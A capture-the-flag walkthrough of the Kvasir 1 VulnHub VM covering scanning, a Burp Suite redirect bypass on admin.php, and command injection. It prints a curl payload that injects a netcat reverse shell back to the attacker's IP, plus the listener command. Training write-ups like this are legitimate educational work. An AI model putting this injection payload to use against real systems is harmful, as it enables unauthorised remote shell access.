Penetration testing

Kvasir 1 VM Walkthrough

Kvasir 1 is a vulnerable VM hosted by vulnhub.com. Rasta Mouse created the challenge. It can be downloaded from the URL https://www.vulnhub.com/entry/kvasir-i,106/

It has Linux operating system that has Virtual Machine OVA format.

Environment:

Attacker Machine is Kali Linux 192.168.44.136
Victim Kvasir 192.168.44.129

When you start the Kvasir VM it will look something as follows:

Debian GNU/Linux 7 kvasir tty1

Kvasir Login:

Let’s us do nmap aggressive and version scan on the target VM with the help of the following command:

#nmap –A –sV 192.168.44.129

Nmap results show that only port 80/tcp is open that serves HTTP and contains Apache httpd 2.2.22 Debian installation.

Now let us visit the site by entering the following in the URL:

http://192.168.44.129

As seen below a login page will appear.

Now let us put Nikto scan in parallel.

The command used for website scanning with Nikto is:

#nikto –h http://192.168.44.129

Also, let us put on scan directory buster parallel.

The following command is used for enumerating the directory on kvasir:

#dirb http:/192.168.44.129

By analyzing the output, we can make out that we have to consider the following URL for testing:

http://192.168.44.129/admin.php

http://192.168.44.129/index.php

Let us visit admin page first. As the page has a 302 redirect, it can be seen in burp suite.

As we would like to see the admin.php in our browser, we request to server http://192.168.44.129/admin.php

Response from the server:

Now edit 302 to 200 as shown below

After changing the response forward it to the browser, and you will see the following page on the browser:

Service check instruction sounds a good area for command injection. As the status of a service can be found by executing the following command in the terminal:

service apache2 status

Assuming our input will be executed on the terminal we can try for command injection.

Well, I tried few syntax, few commands but the commands failed.

Compiling a correct syntax was a bit difficult task.

The following command was able to give me shell access:

#curl –data”service=ssh; netcat –e /bin/bash 192.168.44.136 1234; id #&submit=Submit http://192.168.44.129/admin.php

A listener was setup on port 1234 for any incoming connection.

The command used was:

#nc –lvvp 1234

Finally, I got the shell.

Hashim Shaikh currently works with Aujas Networks. Possessing a both OSCP and CEH, he likes exploring Kali Linux. Interests include offensive security, exploitation, privilege escalation and learning new things. His blog can be found here: http://justpentest.blogspot.in and his LinkedIn Profile here: https://in.linkedin.com/in/hashim-shaikh-oscp-45b90a48

Kvasir 1 VM Walkthrough

Hashim Shaikh

Related Articles

Red Teaming: Taking advantage of Certify to attack AD networks

How ethical hacking and pentesting is changing in 2022

Ransomware penetration testing: Verifying your ransomware readiness

Red Teaming: Main tools for wireless penetration tests